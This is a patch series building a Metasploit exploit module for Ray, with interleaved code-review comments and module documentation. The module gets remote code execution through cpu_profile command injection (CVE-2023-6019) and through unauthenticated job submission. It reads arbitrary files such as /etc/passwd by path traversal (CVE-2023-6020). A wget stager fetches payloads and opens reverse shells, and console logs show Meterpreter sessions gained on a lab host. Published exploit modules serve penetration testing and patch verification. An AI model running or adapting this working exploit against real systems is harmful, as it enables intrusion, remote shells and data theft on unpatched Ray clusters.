From 122767cc59a5e67199bd861196b8f946117b5ea7 Mon Sep 17 00:00:00 2001
From: Takah1ro
Date: Sun, 4 Aug 2024 10:49:11 +0900
Subject: [PATCH 01/42] Implement CVE-2023-6019 module
---
 .../exploits/linux/http/ray_cmdi_rce_lfi.rb | 112 ++++++++++++++++++
 1 file changed, 112 insertions(+)
 create mode 100644 modules/exploits/linux/http/ray_cmdi_rce_lfi.rb
diff --git a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb
new file mode 100644
index 0000000000..e052e55684
--- /dev/null
+++ b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb
@@ -0,0 +1,112 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + prepend Msf::Exploit::Remote::AutoCheck + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Ray cpu_profile command injection', + 'Description' => %q{ + Ray RCE via cpu_profile command injection vulnerability. + }, + 'Author' => [ + 'sierrabearchell', # Vulnerability discovery + 'byt3bl33d3r ', # Python Metasploit module + 'Takahiro Yokoyama' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => [ + ['CVE', '2023-6019'], + ['URL', 'https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe/'], + ['URL', 'https://github.com/protectai/ai-exploits/tree/main/ray'] + ], + 'CmdStagerFlavor' => %i[wget], + 'Payload' => { + 'DisableNops' => true + }, + 'Platform' => %w[linux], + 'Targets' => [ + [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ], + [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ], + [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ] + ], + 'DefaultOptions' => { 'MeterpreterTryToFork' => true }, + 'DefaultTarget' => 0, + 'DisclosureDate' => '2023-11-15', + 'Notes' => { + 'Stability' => [ CRASH_SAFE, ], + 'SideEffects' => [], + 'Reliability' => [ REPEATABLE_SESSION, ] + } + ) + ) + + register_options( + [ + Opt::RPORT(8265), + OptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2023-6019', ['CVE-2023-6019']]), + OptString.new('command', [ true, 'The command to execute', 'echo \'Hello from Metasploit\'' ]) + ] + ) + end + + def get_nodes + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'nodes?view=summary') + }) + return unless res && res.code == 200 + + return JSON.parse(res.body) + end + + def check + @nodes = 
get_nodes + return Exploit::CheckCode::Safe if @nodes.nil? + + Exploit::CheckCode::Appears + end + + def exploit + # We need to pass valid node info to /worker/cpu_profile for the server to process the request + # First we list all nodes and grab the pid and ip of the first one (could be any) + @nodes ||= get_nodes + fail_with(Failure::Unknown, 'Failed to get nodes') unless @nodes + first_node = @nodes['data']['summary'].first + @pid = first_node['agent']['pid'] + @ip = first_node['ip'] + print_good("Grabbed node info, pid: #{@pid}, ip: #{@ip}") + + case datastore['CVE'] + when 'CVE-2023-6019' + res = execute_command(datastore['command']) + fail_with(Failure::Unknown, 'Failed to execute command') unless res + print_good("Command execution seems to have been successful. Status code: #{res.code}") + execute_cmdstager({ flavor: :wget }) + end + end + + def execute_command(cmd, _opts = {}) + send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'worker/cpu_profile'), + 'vars_get' => { + 'pid' => @pid, + 'ip' => @ip, + 'duration' => 5, + 'native' => 0, + 'format' => '`' + cmd + '`' + } + }) + end + +end From 7a233f00498f4196fa78b4aba208c39742e1b926 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Sun, 4 Aug 2024 21:07:05 +0900 Subject: [PATCH 02/42] Update CVE-2023-6019 module --- .../exploits/linux/http/ray_cmdi_rce_lfi.rb | 74 +++++++++++-------- 1 file changed, 42 insertions(+), 32 deletions(-) diff --git a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb index e052e55684..09f0b8da08 100644 --- a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb +++ b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb 
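Review bot: `get_nodes` hands any 200 body to `JSON.parse(res.body)` with no rescue, so a non-JSON 200 (another service or a proxy page on the configured port) raises `JSON::ParserError` out of `check` instead of producing a clean `CheckCode`; `res.get_json_document`, or a `rescue JSON::ParserError` that returns nil, keeps the nil contract the callers already rely on, and the same applies to `get_job_data` introduced in PATCH 03. `'SideEffects' => []` in the Notes is also inaccurate for this module: the wget CmdStager writes the payload to disk on the target and the dashboard requests will presumably show up in its HTTP logs, so `ARTIFACTS_ON_DISK` and `IOC_IN_LOGS` belong there. Minor: `[ CRASH_SAFE, ]` and `[ REPEATABLE_SESSION, ]` carry trailing commas.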
@@ -27,6 +27,8 @@ class MetasploitModule < Msf::Exploit::Remote
 'References' => [
 ['CVE', '2023-6019'],
 ['URL', 'https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe/'],
+ ['URL', 'https://huntr.com/bounties/b507a6a0-c61a-4508-9101-fceb572b0385/'],
+ ['URL', 'https://huntr.com/bounties/787a07c0-5535-469f-8c53-3efa4e5717c7/'],
 ['URL', 'https://github.com/protectai/ai-exploits/tree/main/ray']
 ],
 'CmdStagerFlavor' => %i[wget],
@@ -70,43 +72,51 @@ class MetasploitModule < Msf::Exploit::Remote end def check - @nodes = get_nodes - return Exploit::CheckCode::Safe if @nodes.nil? - - Exploit::CheckCode::Appears - end - - def exploit - # We need to pass valid node info to /worker/cpu_profile for the server to process the request - # First we list all nodes and grab the pid and ip of the first one (could be any) - @nodes ||= get_nodes - fail_with(Failure::Unknown, 'Failed to get nodes') unless @nodes - first_node = @nodes['data']['summary'].first - @pid = first_node['agent']['pid'] - @ip = first_node['ip'] - print_good("Grabbed node info, pid: #{@pid}, ip: #{@ip}") - case datastore['CVE'] when 'CVE-2023-6019' - res = execute_command(datastore['command']) - fail_with(Failure::Unknown, 'Failed to execute command') unless res - print_good("Command execution seems to have been successful. Status code: #{res.code}") - execute_cmdstager({ flavor: :wget }) + @nodes = get_nodes + return Exploit::CheckCode::Safe if @nodes.nil? 
+ + return Exploit::CheckCode::Appears end end - def execute_command(cmd, _opts = {}) - send_request_cgi({ - 'method' => 'GET', - 'uri' => normalize_uri(target_uri.path, 'worker/cpu_profile'), - 'vars_get' => { - 'pid' => @pid, - 'ip' => @ip, - 'duration' => 5, - 'native' => 0, - 'format' => '`' + cmd + '`' - } - }) + def exploit + case datastore['CVE'] + when 'CVE-2023-6019' + # We need to pass valid node info to /worker/cpu_profile for the server to process the request + # First we list all nodes and grab the pid and ip of the first one (could be any) + @nodes ||= get_nodes + fail_with(Failure::Unknown, 'Failed to get nodes') unless @nodes + first_node = @nodes['data']['summary'].first + fail_with(Failure::Unknown, 'Failed to get pid') unless first_node.key?('agent') && first_node['agent'].key?('pid') + pid = first_node['agent']['pid'] + fail_with(Failure::Unknown, 'Failed to get ip') unless first_node.key?('ip') + ip = first_node['ip'] + print_good("Grabbed node info, pid: #{pid}, ip: #{ip}") + opts = { pid: pid, ip: ip } + res = execute_command(datastore['command'], opts) + fail_with(Failure::Unknown, 'Failed to execute command') unless res + print_good("Command execution seems to have been successful. Status code: #{res.code}") + execute_cmdstager({ flavor: :wget }.merge(opts)) + end + end + + def execute_command(cmd, opts = {}) + case datastore['CVE'] + when 'CVE-2023-6019' + return send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'worker/cpu_profile'), + 'vars_get' => { + 'pid' => opts[:pid], + 'ip' => opts[:ip], + 'duration' => 5, + 'native' => 0, + 'format' => "`#{cmd}`" + } + }) + end end end From a5009cd5ff4e7e846ebc4a63c6b61ca0f04d68f6 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Sun, 4 Aug 2024 21:43:17 +0900 Subject: [PATCH 03/42] Add RCE --- .../exploits/linux/http/ray_cmdi_rce_lfi.rb | 38 ++++++++++++++++++- 1 file changed, 36 insertions(+), 2 deletions(-) 
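Review bot: `first_node = @nodes['data']['summary'].first` in `exploit` is still unguarded: a response without `data`/`summary` raises `NoMethodError`, and an empty summary leaves `first_node` nil so the newly added `first_node.key?('agent')` check itself raises instead of failing cleanly. Use `first_node = @nodes.dig('data', 'summary')&.first` followed by `fail_with(Failure::UnexpectedReply, 'No node summary in response') unless first_node`. The two `key?` guards below can then collapse to `pid = first_node.dig('agent', 'pid')` and `ip = first_node['ip']` with a single nil check each.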
diff --git a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb index 09f0b8da08..f20e708b66 100644 --- a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb +++ b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb @@ -14,9 +14,14 @@ class MetasploitModule < Msf::Exploit::Remote super( update_info( info, - 'Name' => 'Ray cpu_profile command injection', + 'Name' => 'Ray cpu_profile command injection, Ray Agent Job RCE', 'Description' => %q{ Ray RCE via cpu_profile command injection vulnerability. + + RCE in Ray via the agent job submission endpoint. + This is intended functionality as Ray's main purpose is executing arbitrary workloads. + By default Ray has no authentication. + }, 'Author' => [ 'sierrabearchell', # Vulnerability discovery @@ -55,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ Opt::RPORT(8265), - OptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2023-6019', ['CVE-2023-6019']]), + OptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2023-6019', ['CVE-2023-6019', 'RCE']]), OptString.new('command', [ true, 'The command to execute', 'echo \'Hello from Metasploit\'' ]) ] ) 
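Review bot: The extended Description names two execution paths but gives no affected-version range for either, and it does not spell out the consequence of the job-submission path being intended functionality, namely that upgrading does not remove it; both are what a reader uses to judge whether a host is exposed. A sentence along the lines of `The cpu_profile injection affects Ray 2.6.3 and earlier; the job submission API is intended functionality and is not removed by upgrading.` would cover it, with the version taken from the module documentation. Minor: the `%q{}` block now ends with an empty line before the closing brace.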
@@ -71,12 +76,35 @@ class MetasploitModule < Msf::Exploit::Remote return JSON.parse(res.body) end + def get_job_data(cmd) + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'api/jobs/'), + 'data' => {'entrypoint' => cmd}.to_json + }) + unless res && res.code == 200 + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'api/job_agent/jobs/'), + 'data' => {'entrypoint' => cmd}.to_json + }) + end + return unless res && res.code == 200 + + return JSON.parse(res.body) + end + def check case datastore['CVE'] when 'CVE-2023-6019' @nodes = get_nodes return Exploit::CheckCode::Safe if @nodes.nil? + return Exploit::CheckCode::Appears + when 'RCE' + @job_data = get_job_data(datastore['command']) + return Exploit::CheckCode::Safe if @job_data.nil? + return Exploit::CheckCode::Appears end end @@ -99,6 +127,10 @@ class MetasploitModule < Msf::Exploit::Remote fail_with(Failure::Unknown, 'Failed to execute command') unless res print_good("Command execution seems to have been successful. Status code: #{res.code}") execute_cmdstager({ flavor: :wget }.merge(opts)) + when 'RCE' + @job_data ||= get_job_data(datastore['command']) + print_good("Command execution successful. Job ID: '#{@job_data['job_id']}' Submission ID: '#{@job_data['submission_id']}'") + execute_cmdstager({ flavor: :wget }) end end @@ -116,6 +148,8 @@ class MetasploitModule < Msf::Exploit::Remote 'format' => "`#{cmd}`" } }) + when 'RCE' + get_job_data(cmd) end end From ca0dba18442620ae26515e07c540286f78192207 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Sun, 4 Aug 2024 22:02:37 +0900 Subject: [PATCH 04/42] Add LFI --- .../exploits/linux/http/ray_cmdi_rce_lfi.rb | 36 +++++++++++++++---- 1 file changed, 30 insertions(+), 6 deletions(-) diff --git a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb index f20e708b66..0c8518398e 100644 --- a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb 
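Review bot: In the new `RCE` branch `check` calls `get_job_data(datastore['command'])`, which submits the configured command as a job and therefore executes it on the target; a `check` is expected not to change target state, and with `AutoCheck` enabled this runs before the operator has asked for the exploit to fire. Consider probing the jobs API in `check` with a request that submits no entrypoint (the job-listing `GET` on the same `api/jobs/` path looks like the natural candidate — confirm against the Ray API) and leave submission to `exploit`. Separately, `get_job_data` retries `api/job_agent/jobs/` on any non-200 from `api/jobs/` and discards the first response, so a `vprint_status("api/jobs/ returned #{res&.code.inspect}, trying job_agent endpoint")` would make failures diagnosable.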
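Review bot: `@job_data['job_id']` in the new `RCE` branch of `exploit` is dereferenced without a nil check, so when `get_job_data` returns nil (both endpoints non-200) the module dies with `NoMethodError` rather than a `fail_with`; add `fail_with(Failure::UnexpectedReply, 'Job submission failed') unless @job_data` before the `print_good`, mirroring the guard the `CMDi` branch above already has. The enclosing `exploit` method starts outside this hunk.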
+++ b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote super( update_info( info, - 'Name' => 'Ray cpu_profile command injection, Ray Agent Job RCE', + 'Name' => 'Ray cpu_profile command injection, Ray Agent Job RCE and Ray static arbitrary file read', 'Description' => %q{ Ray RCE via cpu_profile command injection vulnerability. @@ -22,18 +22,23 @@ class MetasploitModule < Msf::Exploit::Remote This is intended functionality as Ray's main purpose is executing arbitrary workloads. By default Ray has no authentication. + Ray before 2.6.3 is vulnerable to a local file inclusion. }, 'Author' => [ 'sierrabearchell', # Vulnerability discovery 'byt3bl33d3r ', # Python Metasploit module + 'danmcinerney ', # Python Metasploit module 'Takahiro Yokoyama' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2023-6019'], ['URL', 'https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe/'], + # RCE ['URL', 'https://huntr.com/bounties/b507a6a0-c61a-4508-9101-fceb572b0385/'], ['URL', 'https://huntr.com/bounties/787a07c0-5535-469f-8c53-3efa4e5717c7/'], + ['CVE', '2023-6020'], + ['URL', 'https://huntr.com/bounties/83dd8619-6dc3-4c98-8f1b-e620fedcd1f6/'], ['URL', 'https://github.com/protectai/ai-exploits/tree/main/ray'] ], 'CmdStagerFlavor' => %i[wget], @@ -60,8 +65,9 @@ class MetasploitModule < Msf::Exploit::Remote register_options( [ Opt::RPORT(8265), - OptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2023-6019', ['CVE-2023-6019', 'RCE']]), - OptString.new('command', [ true, 'The command to execute', 'echo \'Hello from Metasploit\'' ]) + OptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2023-6019', ['CVE-2023-6019', 'RCE', 'CVE-2023-6020']]), + OptString.new('COMMAND', [ true, 'The command to execute', 'echo \'Hello from Metasploit\'' ]), + OptString.new('FILEPATH', [ true, 'File to read', '/etc/passwd']) ] ) end 
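Review bot: The new Description line `Ray before 2.6.3 is vulnerable to a local file inclusion.` conflicts with the module documentation added in PATCH 07, which states `Ray (<=v2.6.3)` and shows the LFI scenario succeeding against 2.6.3; one of the two should be corrected, presumably to `Ray 2.6.3 and earlier`. Minor: the `# RCE` comment labels two of the references while the CVE-2023-6019 and CVE-2023-6020 entries carry no label, so readers have to cross-reference by id; label each group consistently or drop the one label.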
@@ -94,6 +100,16 @@ class MetasploitModule < Msf::Exploit::Remote return JSON.parse(res.body) end + def lfi + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, "static/js/../../../../../../../../../../../../../..#{datastore['FILEPATH']}") + }) + return unless res && res.code == 200 + res.body + end + + def check case datastore['CVE'] when 'CVE-2023-6019' @@ -102,9 +118,14 @@ class MetasploitModule < Msf::Exploit::Remote return Exploit::CheckCode::Appears when 'RCE' - @job_data = get_job_data(datastore['command']) + @job_data = get_job_data(datastore['COMMAND']) return Exploit::CheckCode::Safe if @job_data.nil? + return Exploit::CheckCode::Appears + when 'CVE-2023-6020' + @file_content = lfi + return Exploit::CheckCode::Safe if @file_content.nil? + return Exploit::CheckCode::Appears end end @@ -123,14 +144,17 @@ class MetasploitModule < Msf::Exploit::Remote ip = first_node['ip'] print_good("Grabbed node info, pid: #{pid}, ip: #{ip}") opts = { pid: pid, ip: ip } - res = execute_command(datastore['command'], opts) + res = execute_command(datastore['COMMAND'], opts) fail_with(Failure::Unknown, 'Failed to execute command') unless res print_good("Command execution seems to have been successful. Status code: #{res.code}") execute_cmdstager({ flavor: :wget }.merge(opts)) when 'RCE' - @job_data ||= get_job_data(datastore['command']) + @job_data ||= get_job_data(datastore['COMMAND']) print_good("Command execution successful. Job ID: '#{@job_data['job_id']}' Submission ID: '#{@job_data['submission_id']}'") execute_cmdstager({ flavor: :wget }) + when 'CVE-2023-6020' + @file_content ||= lfi + print_good(@file_content) end end From 729ecc588a24fec4a5134b43d721bf4a42a62796 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Sun, 4 Aug 2024 22:07:53 +0900 Subject: [PATCH 05/42] Formatting lfi output --- modules/exploits/linux/http/ray_cmdi_rce_lfi.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
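Review bot: `print_good(@file_content)` in the new `CVE-2023-6020` branch of `exploit` runs with `@file_content` nil when `AutoCheck` is disabled and `lfi` returns nil, printing an empty line instead of failing; add `fail_with(Failure::UnexpectedReply, 'Failed to read file') unless @file_content` before it. `lfi` and the matching `check` branch also treat any HTTP 200 as a successful read, so a 200 that is not the requested file (an index or error page served under `static/`) would be reported as vulnerable; at minimum return nil when `res.body` is empty. The enclosing `exploit` method starts outside this hunk.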
diff --git a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb index 0c8518398e..10483e1b47 100644 --- a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb +++ b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb @@ -154,7 +154,7 @@ class MetasploitModule < Msf::Exploit::Remote execute_cmdstager({ flavor: :wget }) when 'CVE-2023-6020' @file_content ||= lfi - print_good(@file_content) + print_good("#{datastore['FILEPATH']}\n#{@file_content}") end end From 0251f1bd8d0dcf83374d1fabb4730dc2213ee3b7 Mon Sep 17 00:00:00 2001 From: Takah1ro Date: Sun, 4 Aug 2024 22:10:15 +0900 Subject: [PATCH 06/42] Rubocop formatting --- modules/exploits/linux/http/ray_cmdi_rce_lfi.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb index 10483e1b47..8f477ee2cb 100644 --- a/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb +++ b/modules/exploits/linux/http/ray_cmdi_rce_lfi.rb @@ -86,13 +86,13 @@ class MetasploitModule < Msf::Exploit::Remote res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'api/jobs/'), - 'data' => {'entrypoint' => cmd}.to_json + 'data' => { 'entrypoint' => cmd }.to_json }) unless res && res.code == 200 res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'api/job_agent/jobs/'), - 'data' => {'entrypoint' => cmd}.to_json + 'data' => { 'entrypoint' => cmd }.to_json }) end return unless res && res.code == 200 @@ -106,10 +106,10 @@ class MetasploitModule < Msf::Exploit::Remote 'uri' => normalize_uri(target_uri.path, "static/js/../../../../../../../../../../../../../..#{datastore['FILEPATH']}") }) return unless res && res.code == 200 + res.body end - def check case datastore['CVE'] when 'CVE-2023-6019' From 93f1362d22bad72bb85dd24354143c17ffbae637 Mon Sep 17 00:00:00 2001 
From: Takah1ro Date: Mon, 5 Aug 2024 08:47:29 +0900 Subject: [PATCH 07/42] Add module document --- .../exploit/linux/http/ray_cmdi_rce_lfi.md | 219 ++++++++++++++++++ 1 file changed, 219 insertions(+) create mode 100644 documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md diff --git a/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md b/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md new file mode 100644 index 0000000000..2ea8d4c1a1 --- /dev/null +++ b/documentation/modules/exploit/linux/http/ray_cmdi_rce_lfi.md 
@@ -0,0 +1,219 @@ +## Vulnerable Application + +Ray (<=v2.6.3) is vulnerable to three vulnerabilities: + * RCE via cpu_profile command injection vulnerability (CVE-2023-6019) + * RCE via the agent job submission endpoint (No CVE) + * local file inclusion (CVE-2023-6020) + +This module exploits all three vulnerabilities. + +The vulnerability affects: + * Ray (<=v2.6.3) + +This module was successfully tested on: + * Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 + +### Install and run the vulnerable Ray (v2.6.3) + +1. Install your favorite virtualization engine (VirtualBox or VMware) on your preferred platform. +2. Install Kali Linux (or other Linux distro) in your virtualization engine. +3. Pull pre-built Ray docker container (v2.6.3) in your VM. + `docker pull rayproject/ray:2.6.3` +4. Start the ray container. + `docker run --shm-size=512M -it -p 8265:8265 rayproject/ray:2.6.3` +5. Start ray. + `ray start --head --dashboard-host=0.0.0.0` + +## Verification Steps + +1. Install the application +2. Start msfconsole +3. Do: `use exploit/linux/http/ray_cmdi_rce_lfi` +4. Do: `set rhost ` +5. Optional: `set rport ` +6. Do: `set lhost ` +7. Optional: `set CVE ` +8. Do: `run` +9. You should get a shell or meterpreter + +## Options + +### CVE (required) + +This is the vulnerability to use. Default is `CVE-2023-6019`, but `RCE` and `CVE-2023-6020` can also be chosen. + +### COMMAND (required) + +This is the command to execute. Default is `echo 'Hello from Metasploit'`. This is used when CVE is set to `CVE-2023-6019` or `RCE`. + +### FILEPATH (required) + +This is the file to read. Default is `/etc/passwd`. This is used when CVE is set to `CVE-2023-6020`. 
+ +## Scenarios +### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (CVE-2023-6019, target 0) +``` +msf6 > use exploit/linux/http/ray_cmdi_rce_lfi +[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6 +rhost => 192.168.56.6 +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1 +lhost => 192.168.56.1 +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve CVE-2023-6019 +cve => CVE-2023-6019 +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set target 0 +target => 0 +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run + +[*] Started reverse TCP handler on 192.168.56.1:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[+] The target appears to be vulnerable. +[+] Grabbed node info, pid: 124, ip: 172.17.0.2 +[+] Command execution seems to have been successful. Status code: 500 +[*] Using URL: http://192.168.56.1:8080/VvzBBm8 +[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /VvzBBm8 +[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu)) +[*] Sending stage (3045380 bytes) to 192.168.56.6 +[*] Command Stager progress - 100.00% done (112/112 bytes) +[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.6:40554) at 2024-08-05 08:26:42 +0900 +[*] Server stopped. 
+ +meterpreter > sysinfo +Computer : 172.17.0.2 +OS : Ubuntu 20.04 (Linux 6.6.15-amd64) +Architecture : x64 +BuildTuple : x86_64-linux-musl +Meterpreter : x64/linux +meterpreter > +``` + +### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (CVE-2023-6019, target 1) +``` +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6 +rhost => 192.168.56.6 +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1 +lhost => 192.168.56.1 +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve CVE-2023-6019 +cve => CVE-2023-6019 +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set target 1 +target => 1 +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set payload linux/x86/shell/reverse_tcp +payload => linux/x86/shell/reverse_tcp +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run + +[*] Started reverse TCP handler on 192.168.56.1:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[+] The target appears to be vulnerable. +[+] Grabbed node info, pid: 124, ip: 172.17.0.2 +[+] Command execution seems to have been successful. Status code: 500 +[*] Using URL: http://192.168.56.1:8080/tMBeDO +[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /tMBeDO +[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu)) +[*] Sending stage (36 bytes) to 192.168.56.6 +[*] Command shell session 2 opened (192.168.56.1:4444 -> 192.168.56.6:39652) at 2024-08-05 08:28:46 +0900 +[*] Command Stager progress - 100.00% done (111/111 bytes) +[*] Server stopped. 
+ +whoami +ray +pwd +/home/ray +``` + +### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (RCE, target 0) +``` +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6 +rhost => 192.168.56.6 +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1 +lhost => 192.168.56.1 +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve RCE +cve => RCE +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set target 0 +target => 0 +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set payload linux/x64/shell/reverse_tcp +payload => linux/x64/shell/reverse_tcp +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run + +[*] Started reverse TCP handler on 192.168.56.1:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[+] The target appears to be vulnerable. +[+] Command execution successful. Job ID: 'raysubmit_TKeWeJRKQZFkU2zN' Submission ID: 'raysubmit_TKeWeJRKQZFkU2zN' +[*] Using URL: http://192.168.56.1:8080/roy19E +[*] Command Stager progress - 100.00% done (111/111 bytes) +[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /roy19E +[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu)) +[*] Sending stage (38 bytes) to 192.168.56.6 +[*] Command shell session 3 opened (192.168.56.1:4444 -> 192.168.56.6:43312) at 2024-08-05 08:40:06 +0900 +[*] Server stopped. 
+ +whoami +ray +pwd +/home/ray +``` + +### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (RCE, target 1) +``` +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6 +rhost => 192.168.56.6 +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set lhost 192.168.56.1 +lhost => 192.168.56.1 +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve RCE +cve => RCE +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set target 1 +target => 1 +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set payload linux/x86/shell/reverse_tcp +payload => linux/x86/shell/reverse_tcp +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run + +[*] Started reverse TCP handler on 192.168.56.1:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[+] The target appears to be vulnerable. +[+] Command execution successful. Job ID: 'raysubmit_g4jZ3U5aQu4gYrFy' Submission ID: 'raysubmit_g4jZ3U5aQu4gYrFy' +[*] Using URL: http://192.168.56.1:8080/ZMCKWGQCHh +[*] Command Stager progress - 100.00% done (115/115 bytes) +[*] Client 192.168.56.6 (Wget/1.20.3 (linux-gnu)) requested /ZMCKWGQCHh +[*] Sending payload to 192.168.56.6 (Wget/1.20.3 (linux-gnu)) +[*] Sending stage (36 bytes) to 192.168.56.6 +[*] Command shell session 4 opened (192.168.56.1:4444 -> 192.168.56.6:42666) at 2024-08-05 08:41:22 +0900 +[*] Server stopped. + +whoami +ray +pwd +/home/ray +``` + +### Ray (v2.6.3) installed with Docker on Kali Linux 6.6.15 (CVE-2023-6020) +``` +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set rhost 192.168.56.6 +rhost => 192.168.56.6 +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > set cve CVE-2023-6020 +cve => CVE-2023-6020 +msf6 exploit(linux/http/ray_cmdi_rce_lfi) > run + +[*] Started reverse TCP handler on 192.168.56.1:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[+] The target appears to be vulnerable. 
